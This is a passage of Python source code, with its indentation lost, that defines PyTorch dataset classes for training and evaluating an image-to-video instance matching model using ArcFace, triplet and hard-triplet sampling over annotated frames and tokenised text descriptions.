text2num = Text2Num(maxLen=maxLen, root_dir=root_dir, PAD=PAD)
self.vocab_size = text2num.vocab_size
label_file = 'label.json'
with open(os.path.join(root_dir, label_file), 'r') as f:
self.labelDic = json.load(f)
self.num_classes = len(self.labelDic['label2index'])
tats = [mode + '_videos']
self.textDic = {}
ds = []
for t in tats:
with open(os.path.join(root_dir, t+'_annotation.json'), 'r') as f:
ds.append(json.load(f))
with open(os.path.join(root_dir, t+'_text.json'), 'r') as f:
self.textDic[t] = json.load(f)
for k in self.textDic.keys():
for kk in self.textDic[k].keys():
self.textDic[k][kk] = text2num(self.textDic[k][kk])
ls = [d['annotations'] for d in ds]
self.images = []
self.videos = {}
print('Loading {} {} data...'.format(mode, imgORvdo))
for i, l in enumerate(ls):
for d in l:
if d['img_name'][:6] not in self.videos:
self.videos[d['img_name'][:6]] = []
# if len(d['annotations']) == 0:
# continue
t = []
t.append(os.path.join(tats[i], d['img_name']))
t.append(d['annotations'])
t.append(d['img_name'])
t.append(tats[i])
self.videos[d['img_name'][:6]].append(t)
# self.images.append(t)
self.videos = list(self.videos.values())
for l in self.videos:
assert len(l) == 10
# print(len(self.images))
self.videos = self.videos[:100]
print('Done')
def __len__(self):
return len(self.videos)
def __getitem__(self, index):
lst = self.videos[index]
datas = []
for imgPath, annotationsList, imgName, t in lst:
# imgPath, annotationsList, imgName, t = self.images[index]
text_name = imgName.split('_')[0]
text = self.textDic[t][text_name]
text = torch.Tensor(text).long()
img = cv2.imread(os.path.join(self.root_dir, imgPath))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = img.astype(np.float32) / 255
annotations = np.zeros((len(annotationsList), 6))
for i, annotationDic in enumerate(annotationsList):
annotation = np.zeros((1, 6))
annotation[0, :4] = annotationDic['box']
annotation[0, 4] = annotationDic['label']
if annotationDic['instance_id'] > 0:
annotation[0, 5] = 1
else:
annotation[0, 5] = 0
annotations[i:i+1, :] = annotation
# annotations = np.append(annotations, annotation, axis=0)
sample = {'img': img, 'annot': annotations, 'text': text}
datas.append(sample)
if self.transform:
datas = self.transform(datas)
return datas
# def label2index(self, label):
# return self.labelDic['label2index'][label]
# def index2label(self, index):
# return self.labelDic['index2label'][str(index)]
# def getImagePath(self, index):
# imgPath, annotationsList, imgName, t = self.images[index]
# return imgPath
# def getImageInfo(self, index):
# imgPath, annotationsList, imgName, t = self.images[index]
# imgID, frame = imgName[:-4].split('_')
# return imgPath, imgID, frame
'''
for arcface
'''
class ArcfaceDataset(Dataset):
def __init__(self, root_dir='data', mode='train', size=(112, 112), flip_x=0.5, maxLen=64, PAD=0, imgORvdo='all'):
assert mode in ['train', 'all']
assert imgORvdo in ['all', 'image', 'video']
mean=[0.55574415, 0.51230767, 0.51123354]
aa_params = dict(
translate_const=int(size[0] * 0.40),
img_mean=tuple([min(255, round(255 * x)) for x in mean]),
)
self.randAug = rand_augment_transform('rand-m9-n3-mstd0.5', aa_params)
self.root_dir = root_dir
self.size = size
self.flip_x = flip_x
if mode == 'train':
modes = ['train']
instanceFile = 'instanceID.json'
elif mode == 'train_2':
modes = ['train', 'validation_2']
instanceFile = 'instanceID_2.json'
elif mode == 'all':
modes = ['train', 'validation_2', 'validation']
instanceFile = 'instanceID_all.json'
with open(os.path.join(root_dir, instanceFile), 'r') as f:
self.clsDic = json.load(f)
with open(os.path.join(root_dir, 'instance2label.json'), 'r') as f:
self.instance2label = json.load(f)
text2num = Text2Num(maxLen=maxLen, root_dir=root_dir, PAD=PAD)
self.vocab_size = text2num.vocab_size
self.images = []
self.textDics = {}
for mode in modes:
if imgORvdo == 'all':
tats = [mode + '_images', mode + '_videos']
elif imgORvdo == 'image':
tats = [mode + '_images']
elif imgORvdo == 'video':
tats = [mode + '_videos']
# img_tat = mode + '_images'
# vdo_tat = mode + '_videos'
savePath = mode + '_instance'
self.savePath = os.path.join(root_dir, savePath)
d = []
textDic = []
for tat in tats:
with open(os.path.join(root_dir, tat+'_annotation.json'), 'r') as f:
d.append(json.load(f))
with open(os.path.join(root_dir, tat+'_text.json'), 'r') as f:
textDic.append(json.load(f))
for i in range(len(textDic)):
for k in textDic[i].keys():
textDic[i][k] = text2num(textDic[i][k])
self.textDics[mode] = textDic
l = [dd['annotations'] for dd in d]
print('Loading data...')
for i, ll in enumerate(l):
for d in ll:
for dd in d['annotations']:
if dd['instance_id'] > 0 and str(dd['instance_id']) in self.clsDic.keys():
t = []
t.append(os.path.join(self.savePath, str(dd['instance_id']), tats[i]+str(dd['instance_id'])+d['img_name']))
t.append(dd['instance_id'])
t.append(d['img_name'].split('_')[0])
t.append(i)
t.append(mode)
self.images.append(t)
self.num_classes = len(self.clsDic)
self.num_labels = len(set(self.instance2label.values()))
# self.images = self.images[:2222]
print('Done')
self.transform = transforms.Normalize(
mean=[0.55574415, 0.51230767, 0.51123354],
std=[0.21303795, 0.21604613, 0.21273348])
def __len__(self):
return len(self.images)
def __getitem__(self, index):
imgName, instance_id, textName, iORv, mode = self.images[index]
img = np.load(imgName[:-4]+'.npy')
# img = cv2.imread(imgName[:-4]+'.jpg')
# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# img = img.astype(np.float32) / 255
# '''randAug'''
# img = Image.fromarray(np.uint8(img*255))
# img = self.randAug(img)
# img.save('aaa.jpg')
# img = np.array(img)
# img = img.astype(np.float32) / 255
# '''randAug'''
text = self.textDics[mode][iORv][textName]
text = torch.tensor(text).long()
iORv = torch.tensor(iORv).long()
h, w, c = img.shape
# print(h,w,c)
rh = random.randint(0, h-256)
rw = random.randint(0, w-256)
img = img[rh:256+rh, rw:256+rw, :]
img = cv2.resize(img, self.size)
# '''random erasing'''
# if np.random.rand() < 0.5:
# w = h = 256
# while w >= 256 or h >= 256:
# r = np.random.uniform(0.3, 1/0.3)
# s = 256*256*np.random.uniform(0.02, 0.4)
# w = int(np.sqrt(s*r))
# h = int(np.sqrt(s/r))
# s_w = random.randint(0, 256-w)
# s_h = random.randint(0, 256-h)
# img[s_h:s_h+h, s_w:s_w+w, :] = 0
# print(img.shape)
instance = torch.tensor(self.clsDic[str(instance_id)])
label = torch.tensor(self.instance2label[str(instance_id)])
if np.random.rand() < self.flip_x:
img = img[:, ::-1, :].copy()
img = torch.from_numpy(img)
img = img.permute(2, 0, 1)
img = self.transform(img)
return {'img':img, 'instance':instance, 'label':label, 'text': text, 'iORv': iORv}
# return {'instance':instance, 'label':label, 'text': text, 'iORv': iORv}
class ArcfaceDatasetSeparate(Dataset):
def __init__(self, root_dir='data', mode='train', size=(112, 112), flip_x=0.5, maxLen=64, PAD=0, imgORvdo='all'):
assert mode in ['train']
assert imgORvdo in ['all']
self.root_dir = root_dir
self.size = size
self.flip_x = flip_x
if imgORvdo == 'all':
tats = [mode + '_images', mode + '_videos']
elif imgORvdo == 'image':
tats = [mode + '_images']
elif imgORvdo == 'video':
tats = [mode + '_videos']
savePath = mode + '_instance'
self.savePath = os.path.join(root_dir, savePath)
text2num = Text2Num(maxLen=maxLen, root_dir=root_dir, PAD=PAD)
self.vocab_size = text2num.vocab_size
d = []
self.textDic = []
for tat in tats:
with open(os.path.join(root_dir, tat+'_annotation.json'), 'r') as f:
d.append(json.load(f))
with open(os.path.join(root_dir, tat+'_text.json'), 'r') as f:
self.textDic.append(json.load(f))
for i in range(len(self.textDic)):
for k in self.textDic[i].keys():
self.textDic[i][k] = text2num(self.textDic[i][k])
l = [dd['annotations'] for dd in d]
self.images = []
with open(os.path.join(root_dir, 'instanceID.json'), 'r') as f:
self.clsDic = json.load(f)
with open(os.path.join(root_dir, 'instance2label.json'), 'r') as f:
self.instance2label = json.load(f)
names = ['image', 'video']
print('Loading data...')
for i, ll in enumerate(l):
for d in ll:
for dd in d['annotations']:
if dd['instance_id'] > 0 and str(dd['instance_id']) in self.clsDic.keys():
t = []
t.append(os.path.join(str(dd['instance_id']), tats[i]+str(dd['instance_id'])+d['img_name']))
t.append(dd['instance_id'])
t.append(d['img_name'].split('_')[0])
t.append(names[i])
self.images.append(t)
self.num_classes = len(self.clsDic)
self.num_labels = len(set(self.instance2label.values()))
self.dic = {}
for i in range(len(self.images)):
imgName, instance_id, textName, iORv = self.images[i]
if instance_id not in self.dic:
self.dic[instance_id] = {}
self.dic[instance_id]['image'] = []
self.dic[instance_id]['video'] = []
self.dic[instance_id][iORv].append(i)
for k in self.dic.keys():
if len(self.dic[k]['image']) == 0 or len(self.dic[k]['video']) == 0:
del self.dic[k]
self.dic = list(self.dic.items())
# self.images = self.images[:2222]
print('Done')
self.transform = transforms.Normalize(
mean=[0.55574415, 0.51230767, 0.51123354],
std=[0.21303795, 0.21604613, 0.21273348])
def __len__(self):
return len(self.dic)
def __getitem__(self, index):
imgIndex = random.choice(self.dic[index][1]['image'])
vdoIndex = random.choice(self.dic[index][1]['video'])
sample = []
instances = []
for index in [imgIndex, vdoIndex]:
imgName, instance_id, textName, iORv = self.images[index]
img = np.load(os.path.join(self.savePath, imgName)[:-4]+'.npy')
# text = self.textDic[iORv][textName]
# text = torch.tensor(text).long()
# iORv = torch.tensor(iORv).long()
h, w, c = img.shape
rh_1 = random.randint(0, h-224)
rh_2 = random.randint(224, h)
rw_1 = random.randint(0, w-224)
rw_2 = random.randint(224, w)
img = img[rh_1:rh_2, rw_1:rw_2, :]
img = cv2.resize(img, self.size)
instances.append(torch.tensor(self.clsDic[str(instance_id)]))
# label = torch.tensor(self.instance2label[str(instance_id)])
if np.random.rand() < self.flip_x:
img = img[:, ::-1, :].copy()
img = torch.from_numpy(img)
img = img.permute(2, 0, 1)
img = self.transform(img)
sample.append(img)
assert instances[0] == instances[1]
return {'img': sample[0], 'vdo':sample[1], 'instance':instances[0]}
class TripletDataset(Dataset):
def __init__(self, root_dir='data', mode='train', size=(112, 112), flip_x=0.5):
assert mode in ['train']
self.root_dir = root_dir
self.size = size
self.flip_x = flip_x
img_tat = mode + '_images'
vdo_tat = mode + '_videos'
savePath = mode + '_instance'
self.savePath = os.path.join(root_dir, savePath)
with open(os.path.join(root_dir, img_tat+'_annotation.json'), 'r') as f:
d_i = json.load(f)
with open(os.path.join(root_dir, vdo_tat+'_annotation.json'), 'r') as f:
d_v = json.load(f)
with open(os.path.join(root_dir, 'instanceID.json'), 'r') as f:
self.clsDic = json.load(f)
with open(os.path.join(root_dir, 'instance2label.json'), 'r') as f:
instance2label = json.load(f)
l_i = d_i['annotations']
l_v = d_v['annotations']
self.images = []
print('Loading data...')
for d in l_i:
for dd in d['annotations']:
if dd['instance_id'] > 0 and str(dd['instance_id']) in self.clsDic.keys():
t = []
t.append(os.path.join(str(dd['instance_id']), img_tat+str(dd['instance_id'])+d['img_name']))
t.append(self.clsDic[str(dd['instance_id'])])
t.append(instance2label[str(dd['instance_id'])])
self.images.append(t)
for d in l_v:
for dd in d['annotations']:
if dd['instance_id'] > 0 and str(dd['instance_id']) in self.clsDic.keys():
t = []
t.append(os.path.join(str(dd['instance_id']), vdo_tat+str(dd['instance_id'])+d['img_name']))
t.append(self.clsDic[str(dd['instance_id'])])
t.append(instance2label[str(dd['instance_id'])])
self.images.append(t)
self.num_classes = len(self.clsDic)
self.num_labels = len(set(instance2label.values()))
self.cls_ins_dic = {}
for i, l in enumerate(self.images):
imgName, instance_id, label = l
if label not in self.cls_ins_dic:
self.cls_ins_dic[label] = {}
if instance_id not in self.cls_ins_dic[label]:
self.cls_ins_dic[label][instance_id] = []
self.cls_ins_dic[label][instance_id].append(i)
for k in self.cls_ins_dic.keys():
if len(self.cls_ins_dic[k]) < 2:
raise RuntimeError('size of self.cls_ins_dic[k] must be larger than 1')
print('Done')
self.transform = transforms.Normalize(
mean=[0.55574415, 0.51230767, 0.51123354],
std=[0.21303795, 0.21604613, 0.21273348])
def __len__(self):
return len(self.images)
def __getitem__(self, index):
imgName_q, instance_id_q, label_q = self.images[index]
p_index = index
while p_index == index:
p_index = random.choice(self.cls_ins_dic[label_q][instance_id_q])
instance_id_n = instance_id_q
while instance_id_n == instance_id_q:
instance_id_n = random.choice(list(self.cls_ins_dic[label_q].keys()))
n_index = random.choice(self.cls_ins_dic[label_q][instance_id_n])
imgName_p, instance_id_p, label_p = self.images[p_index]
imgName_n, instance_id_n, label_n = self.images[n_index]
assert len(set([label_q, label_p, label_n])) == 1
assert len(set([instance_id_q, instance_id_p])) == 1
instance_id_q = torch.tensor(instance_id_q)
instance_id_p = torch.tensor(instance_id_p)
instance_id_n = torch.tensor(instance_id_n)
img_q = np.load(os.path.join(self.savePath, imgName_q)[:-4]+'.npy')
img_p = np.load(os.path.join(self.savePath, imgName_p)[:-4]+'.npy')
img_n = np.load(os.path.join(self.savePath, imgName_n)[:-4]+'.npy')
hq, wq, cq = img_q.shape
hp, wp, cp = img_p.shape
hn, wn, cn = img_n.shape
rh = random.randint(0, hq-self.size[0])
rw = random.randint(0, wq-self.size[1])
img_q = img_q[rh:self.size[0]+rh, rw:self.size[1]+rw, :]
rh = random.randint(0, hp-self.size[0])
rw = random.randint(0, wp-self.size[1])
img_p = img_p[rh:self.size[0]+rh, rw:self.size[1]+rw, :]
rh = random.randint(0, hn-self.size[0])
rw = random.randint(0, wn-self.size[1])
img_n = img_n[rh:self.size[0]+rh, rw:self.size[1]+rw, :]
if np.random.rand() < self.flip_x:
img_q = img_q[:, ::-1, :].copy()
if np.random.rand() < self.flip_x:
img_p = img_p[:, ::-1, :].copy()
if np.random.rand() < self.flip_x:
img_n = img_n[:, ::-1, :].copy()
img_q = torch.from_numpy(img_q).permute(2, 0, 1)
img_p = torch.from_numpy(img_p).permute(2, 0, 1)
img_n = torch.from_numpy(img_n).permute(2, 0, 1)
img_q = self.transform(img_q)
img_p = self.transform(img_p)
img_n = self.transform(img_n)
return {
'img_q':img_q,
'img_p':img_p,
'img_n':img_n,
'img_q_instance':instance_id_q,
'img_p_instance':instance_id_p,
'img_n_instance':instance_id_n,
}
class HardTripletDataset(Dataset):
def __init__(self, root_dir='data', mode='train', size=(112, 112), flip_x=0.5, n_samples=4):
assert mode in ['train', 'all', 'train_2']
mean=[0.55574415, 0.51230767, 0.51123354]
aa_params = dict(
translate_const=int(size[0] * 0.40),
img_mean=tuple([min(255, round(255 * x)) for x in mean]),
)
self.randAug = rand_augment_transform('rand-m9-n3-mstd0.5', aa_params)
self.root_dir = root_dir
self.size = size
self.flip_x = flip_x
self.n_samples = n_samples
if mode == 'train':
modes = ['train']
instanceFile = 'instanceID.json'
elif mode == 'train_2':
modes = ['train', 'validation_2']
instanceFile = 'instanceID_2.json'
elif mode == 'all':
modes = ['train', 'validation_2', 'validation']
instanceFile = 'instanceID_all.json'
with open(os.path.join(root_dir, instanceFile), 'r') as f:
self.clsDic = json.load(f)
self.samples = {}
for mode in modes:
img_tat = mode + '_images'
vdo_tat = mode + '_videos'
savePath = mode + '_instance'
savePath = os.path.join(root_dir, savePath)
with open(os.path.join(root_dir, img_tat+'_annotation.json'), 'r') as f:
d_i = json.load(f)
with open(os.path.join(root_dir, vdo_tat+'_annotation.json'), 'r') as f:
d_v = json.load(f)
l_i = d_i['annotations']
l_v = d_v['annotations']
print('Loading data...')
for d in l_i:
for dd in d['annotations']:
if dd['instance_id'] > 0 and str(dd['instance_id']) in self.clsDic.keys():
instance = self.clsDic[str(dd['instance_id'])]
if instance not in self.samples:
self.samples[instance] = []
self.samples[instance].append(
os.path.join(savePath, str(dd['instance_id']), img_tat+str(dd['instance_id'])+d['img_name']))
for d in l_v:
for dd in d['annotations']:
if dd['instance_id'] > 0 and str(dd['instance_id']) in self.clsDic.keys():
instance = self.clsDic[str(dd['instance_id'])]
if instance not in self.samples:
self.samples[instance] = []
self.samples[instance].append(
os.path.join(savePath, str(dd['instance_id']), vdo_tat+str(dd['instance_id'])+d['img_name']))
self.num_classes = len(self.clsDic)
for k in self.samples.keys():
while len(self.samples[k]) < n_samples:
self.samples[k] *= 2
assert len(self.samples[k]) >= n_samples
self.instances = list(self.samples.keys())
print('Done')
self.transform = transforms.Normalize(
mean=[0.55574415, 0.51230767, 0.51123354],
std=[0.21303795, 0.21604613, 0.21273348])
def __len__(self):
return len(self.instances)
def __getitem__(self, index):
instance = self.instances[index]
imgPaths = random.sample(self.samples[instance], self.n_samples)
imgs = []
instances = []
for imgPath in imgPaths:
img = np.load(imgPath[:-4]+'.npy')
# '''randAug'''
# img = Image.fromarray(np.uint8(img*255))
# img = self.randAug(img)
# img.save('aaa.jpg')
# img = np.array(img)
# img = img.astype(np.float32) / 255
# '''randAug'''
assert self.size[0] == 256
if self.size[0] != 256:
r = 256 / self.size[0]
img = cv2.resize(img, (int(270/r), int(270/r)))
h, w, c = img.shape
rh = random.randint(0, h-self.size[0])
rw = random.randint(0, w-self.size[1])
img = img[rh:self.size[0]+rh, rw:self.size[1]+rw, :]
# if np.random.rand() < 0.5:
# w = h = 256
# while w >= 256 or h >= 256:
# r = np.random.uniform(0.3, 1/0.3)
# s = 256*256*np.random.uniform(0.02, 0.4)
# w = int(np.sqrt(s*r))
# h = int(np.sqrt(s/r))
# s_w = random.randint(0, 256-w)
# s_h = random.randint(0, 256-h)
# img[s_h:s_h+h, s_w:s_w+w, :] = 0
instance_t = torch.tensor(instance)
if np.random.rand() < self.flip_x:
img = img[:, ::-1, :].copy()
img = torch.from_numpy(img)
img = img.permute(2, 0, 1)
img = self.transform(img)
imgs.append(img)
instances.append(instance_t)
imgs = torch.stack(imgs, dim=0)
instances = torch.stack(instances, dim=0)
return {'img': imgs, 'instance': instances}
'''
for validation
'''
class ValidationArcfaceDataset(Dataset):
def __init__(self, size=(112, 112), root_dir='data/validation_instance/', maxLen=64, PAD=0):
self.root_dir = root_dir
self.size = size
text2num = Text2Num(maxLen=maxLen, root_dir='data', PAD=PAD)
self.vocab_size = text2num.vocab_size
img_tat = 'validation_images'
vdo_tat = 'validation_videos'
with open(os.path.join('data', img_tat+'_text.json'), 'r') as f:
self.textDic_i = json.load(f)
with open(os.path.join('data', vdo_tat+'_text.json'), 'r') as f:
self.textDic_v = json.load(f)
for k in self.textDic_i.keys():
self.textDic_i[k] = text2num(self.textDic_i[k])
for k in self.textDic_v.keys():
self.textDic_v[k] = text2num(self.textDic_v[k])
instances = os.listdir(root_dir)
self.items = []
# s = ''
print('Loading Data...')
for instance in tqdm(instances):
imgs = os.listdir(root_dir+instance)
if len(imgs) < 2:
continue
l = []
for img in imgs:
if 'images' in img:
l.append(os.path.join(instance, img))
text_name = img.split(instance)[-1].split('_')[0]
l.append(text_name)
break
if len(l) == 0:
continue
for img in imgs:
if 'videos' in img:
l.append(os.path.join(instance, img))
text_name = img.split(instance)[-1].split('_')[0]
l.append(text_name)
break
if len(l) < 4:
continue
l.append(instance)
# s += '{}\t{}\n'.format(l[0], l[2])
self.items.append(l)
# with open('validation_path.txt', 'w') as f:
# f.write(s)
self.length = len(self.items)
print('Done')
self.transform = transforms.Normalize(
mean=[0.55574415, 0.51230767, 0.51123354],
std=[0.21303795, 0.21604613, 0.21273348])
def __len__(self):
return len(self.items) * 2
def __getitem__(self, index):
imgPath, textName_img, vdoPath, textName_vdo, instance = self.items[index%self.length]
img_text = self.textDic_i[textName_img]
vdo_text = self.textDic_v[textName_vdo]
img_text = torch.Tensor(img_text).long()
vdo_text = torch.Tensor(vdo_text).long()
# img = np.load(os.path.join(self.root_dir, imgPath))
# vdo = np.load(os.path.join(self.root_dir, vdoPath))
img = cv2.imread(os.path.join(self.root_dir, imgPath))
vdo = cv2.imread(os.path.join(self.root_dir, vdoPath))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = img.astype(np.float32) / 255
vdo = cv2.cvtColor(vdo, cv2.COLOR_BGR2RGB)
vdo = vdo.astype(np.float32) / 255
hi, wi, ci = img.shape
hv, wv, cv = vdo.shape
if self.size[0] != 256:
r = 256 / self.size[0]
img = cv2.resize(img, (int(hi/r), int(wi/r)))
vdo = cv2.resize(vdo, (int(hv/r), int(wv/r)))
hi, wi, ci = img.shape
hv, wv, cv = vdo.shape
rh = (hi-self.size[0])//2
rw = (wi-self.size[1])//2
img = img[rh:self.size[0]+rh, rw:self.size[1]+rw, :]
rh = (hv-self.size[0])//2
rw = (wv-self.size[1])//2
vdo = vdo[rh:self.size[0]+rh, rw:self.size[1]+rw, :]
if index >= self.length:
img = img[:, ::-1, :].copy()
vdo = vdo[:, ::-1, :].copy()
img = torch.from_numpy(img)
img = img.permute(2, 0, 1)
vdo = torch.from_numpy(vdo)
vdo = vdo.permute(2, 0, 1)
img = self.transform(img)
vdo = self.transform(vdo)
return {
'img': img,
'vdo': vdo,
'img_text': img_text,
'vdo_text': vdo_text,
'instance':instance,
'img_e': torch.tensor(0),
'vdo_e': torch.tensor(1)
}
class ValidationDataset(Dataset):
def __init__(self, root_dir, items, size):
self.size = size
self.root_dir = root_dir
self.imgPath = None
self.img = None
self.items = items
self.transform = transforms.Normalize(
mean=[0.55574415, 0.51230767, 0.51123354],
std=[0.21303795, 0.21604613, 0.21273348])
def __len__(self):
return len(self.items)
def __getitem__(self, index):
frame, imgID, imgPath, xmin, ymin, xmax, ymax, classes = self.items[index]
if imgPath != self.imgPath:
self.imgPath = imgPath
self.img = cv2.imread(os.path.join(self.root_dir, imgPath))
det = self.img[ymin:ymax, xmin:xmax, :].copy()
det = cv2.resize(det, self.size)
det = cv2.cvtColor(det, cv2.COLOR_BGR2RGB)
det = det.astype(np.float32) / 255
det = torch.from_numpy(det)
det = det.permute(2, 0, 1)
det = self.transform(det)
# print(classes)
return {
'img': det,
'imgID': imgID,
'frame': frame,
'box': np.array([xmin, ymin, xmax, ymax]),
'classes': classes}
'''
for test
'''
class TestImageDataset(Dataset):
def __init__(self, root_dir='data', dir_list=['validation_dataset_part1', 'validation_dataset_part2'], transform=None, maxLen=64, PAD=0):
self.root_dir = root_dir
self.transform = transform
self.mode = 'image'
label_file = 'label.json'
with open(os.path.join(root_dir, label_file), 'r') as f:
self.labelDic = json.load(f)
self.num_classes = len(self.labelDic['label2index'])
dirs = [os.path.join(root_dir, d) for d in dir_list]
text2num = Text2Num(maxLen=maxLen, PAD=PAD)
self.vocab_size = text2num.vocab_size
self.images = []
self.ids = []
self.frames = []
self.textDic = {}
for di in dirs:
img_dir_list = os.listdir(os.path.join(di, 'image'))
for img_dir in img_dir_list:
img_names = os.listdir(os.path.join(di, 'image', img_dir))
for img_name in img_names:
self.images.append(os.path.join(di, 'image', img_dir, img_name))
self.frames.append(img_name.split('.')[0])
self.ids.append(img_dir)
textPath = os.path.join(di, 'image_text', img_dir+'.txt')
with open(textPath, 'r') as f:
self.textDic[img_dir] = text2num(f.readline())
# self.images = self.images[:100]
def __len__(self):
return len(self.images)
def __getitem__(self, index):
imgPath = self.images[index]
img = cv2.imread(imgPath)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = img.astype(np.float32) / 255
img_id = self.ids[index]
text = self.textDic[img_id]
text = torch.Tensor(text).long()
sample = {'img': img, 'text': text}
if self.transform:
sample = self.transform(sample)
return sample
def getImageInfo(self, index):
imgPath = self.images[index]
img_id = self.ids[index]
frame = self.frames[index]
return imgPath, img_id, frame
# class TestVideoDataset(Dataset):
# def __init__(self, root_dir, transform=None, n=20, maxLen=64, PAD=0):
# self.root_dir = root_dir
# self.transform = transform
# self.n = n
# self.mode = 'video'
# label_file = 'label.json'
# with open(label_file, 'r') as f:
# self.labelDic = json.load(f)
# self.num_classes = len(self.labelDic['label2index'])
# text2num = Text2Num(maxLen=maxLen, PAD=PAD)
# self.vocab_size = text2num.vocab_size
# # gap = 400 // n
# # self.frames_ids = [i*gap for i in range(n)]
# self.videos = []
# self.ids = []
# self.textDic = {}
# vdo_names = os.listdir(os.path.join(root_dir, 'video'))
# for vdo_name in vdo_names:
# self.videos.append(os.path.join(root_dir, 'video', vdo_name))
# self.ids.append(vdo_name.split('.')[0])
# textPath = os.path.join(root_dir, 'video_text', vdo_name.split('.')[0]+'.txt')
# with open(textPath, 'r') as f:
# self.textDic[vdo_name.split('.')[0]] = text2num(f.readline())
# # self.videos = self.videos[:100]
# def __len__(self):
# return len(self.videos)*self.n
# def __getitem__(self, index):
# v_index = index // self.n
# # f_index = self.frames_ids[index % self.n]
# vdo_name = self.videos[v_index]
# cap = cv2.VideoCapture(vdo_name)
# frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
# f_index = int((frames // self.n) * (index % self.n))
# cap.set(cv2.CAP_PROP_POS_FRAMES, f_index)
# ret, img = cap.read()
# cap.release()
# vdo_id = self.ids[v_index]
# text = self.textDic[vdo_id]
# text = torch.tensor(text).long()
# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# img = img.astype(np.float32) / 255
# sample = {'img': img, 'text': text}
# if self.transform:
# sample = self.transform(sample)
# return sample
class TestVideoDataset(Dataset):
def __init__(self, root_dir, transform=None, n=20, dir_list=['validation_dataset_part1', 'validation_dataset_part2'], maxLen=64, PAD=0):
self.root_dir = root_dir
self.transform = transform
self.n = n
self.mode = 'video'
label_file = 'label.json'
with open(os.path.join(root_dir, label_file), 'r') as f:
self.labelDic = json.load(f)
self.num_classes = len(self.labelDic['label2index'])
text2num = Text2Num(maxLen=maxLen, PAD=PAD)
self.vocab_size = text2num.vocab_size
dirs = [os.path.join(root_dir, d) for d in dir_list]
# gap = 400 // n
# self.frames_ids = [i*gap for i in range(n)]
self.videos = []
self.ids = []
self.textDic = {}
for di in dirs:
vdo_names = os.listdir(os.path.join(di, 'video'))
for vdo_name in vdo_names:
self.videos.append(os.path.join(di, 'video', vdo_name))
self.ids.append(vdo_name.split('.')[0])
textPath = os.path.join(di, 'video_text', vdo_name.split('.')[0]+'.txt')
with open(textPath, 'r') as f:
self.textDic[vdo_name.split('.')[0]] = text2num(f.readline())
# self.videos = self.videos[:10]
def __len__(self):
return len(self.videos)*self.n
def __getitem__(self, index):
v_index = index // self.n
# f_index = self.frames_ids[index % self.n]
vdo_name = self.videos[v_index]
cap = cv2.VideoCapture(vdo_name)
frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
f_index = int((frames // self.n) * (index % self.n))
cap.set(cv2.CAP_PROP_POS_FRAMES, f_index)
ret, img = cap.read()
cap.release()
vdo_id = self.ids[v_index]
text = self.textDic[vdo_id]
text = torch.Tensor(text).long()
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = img.astype(np.float32) / 255
sample = {'img': img, 'text': text}
if self.transform:
sample = self.transform(sample)
return sample
def getImageInfo(self, index):
v_index = index // self.n
# frame = self.frames_ids[index % self.n]
vdoPath = self.videos[v_index]
cap = cv2.VideoCapture(vdoPath)
frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
frame = int((frames // self.n) * (index % self.n))
cap.release()
vdo_id = self.ids[v_index]
return vdoPath, vdo_id, str(frame)
class TestDataset(Dataset):
def __init__(self, root_dir, items, size, mode):
assert mode in ['image', 'video']
self.mode = mode
self.size = size
self.root_dir = root_dir
self.items = items
self.length = len(items)
self.transform = transforms.Normalize(
mean=[0.55574415, 0.51230767, 0.51123354],
std=[0.21303795, 0.21604613, 0.21273348])
def __len__(self):
return len(self.items) * 2
def __getitem__(self, index):
frame, imgID, imgPath, xmin, ymin, xmax, ymax, classes, text = self.items[index%self.length]
if self.mode == 'image':
img = cv2.imread(imgPath)
else:
cap = cv2.VideoCapture(imgPath)
cap.set(cv2.CAP_PROP_POS_FRAMES, int(frame))
ret, img = cap.read()
cap.release()
det = img[ymin:ymax, xmin:xmax, :]
if index >= self.length:
det = det[:, ::-1, :].copy()
det = cv2.resize(det, self.size)
det = cv2.cvtColor(det, cv2.COLOR_BGR2RGB)
det = det.astype(np.float32) / 255
det = torch.from_numpy(det)
det = det.permute(2, 0, 1)
det = self.transform(det)
return {
'img': det,
'imgID': imgID,
'frame': frame,
'box': np.array([xmin, ymin, xmax, ymax]),
'classes': classes,
'text': text}
if __name__ == "__main__":
from config import get_args_arcface
opt = get_args_arcface()
dataset = ArcfaceDataset()
# print(len(dataset))
print(dataset[0])
# from utils import collater_HardTriplet
# from torch.utils.data import DataLoader
# training_params = {"batch_size": 20,
# "shuffle": True,
# "drop_last": True,
# "collate_fn": collater_HardTriplet,
# "num_workers": 4}
# from PIL import Image
# dataset = ArcfaceDataset()
# print(dataset[0])
# loader = DataLoader(dataset, **training_params)
# for data in loader:
# print(data['img'].size())
# break
# print(len(dataset))
# for d in tqdm(dataset):
# pass
# img = dataset[100]['img']
# mi = min(img.view(-1))
# ma = max(img.view(-1))
# img = (img-mi)/(ma-mi)
# img = img*256
# img = img.permute(1, 2, 0)
# img = img.numpy()
# img = Image.fromarray(img.astype(np.uint8))
# img.save('aaa.jpg')
# img = dataset[0]['vdo']
# mi = min(img.view(-1))
# ma = max(img.view(-1))
# img = (img-mi)/(ma-mi)
# img = img*256
# img = img.permute(1, 2, 0)
# img = img.numpy()
# img = Image.fromarray(img.astype(np.uint8))
# img.save('bbb.jpg')
# mean = np.zeros(3)
# std = np.zeros(3)
# for d in tqdm(dataset):
# img = d['img']
# for i in range(3):
# mean[i] += img[:, :, i].mean()
# std[i] += img[:, :, i].std()
# mean = mean / len(dataset)
# std = std / len(dataset)
# print(mean, std)
